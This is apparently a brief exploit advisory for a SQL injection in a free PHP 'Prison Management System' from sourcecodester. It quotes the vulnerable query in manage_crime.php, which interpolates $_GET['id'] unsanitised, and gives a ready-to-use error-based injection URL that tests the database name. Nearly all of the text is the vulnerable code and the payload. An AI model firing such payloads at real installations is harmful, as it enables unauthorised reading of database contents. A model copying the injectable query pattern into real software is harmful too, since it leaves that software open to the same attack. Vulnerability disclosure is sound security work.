Vendor Homepage : https://www.sourcecodester.com/
Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html
[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET['id'] in /pms/admin/crimes/manage_crime.php:4
$qry = $conn->query("SELECT * from `crime_list` where id = '{$_GET['id']}' and `delete_flag` = 0 ");- Payload :
# Error Based
http://localhost/pms/admin/crimes/manage_crime.php?id=1'-if(database()='pms_db',0,1)%23

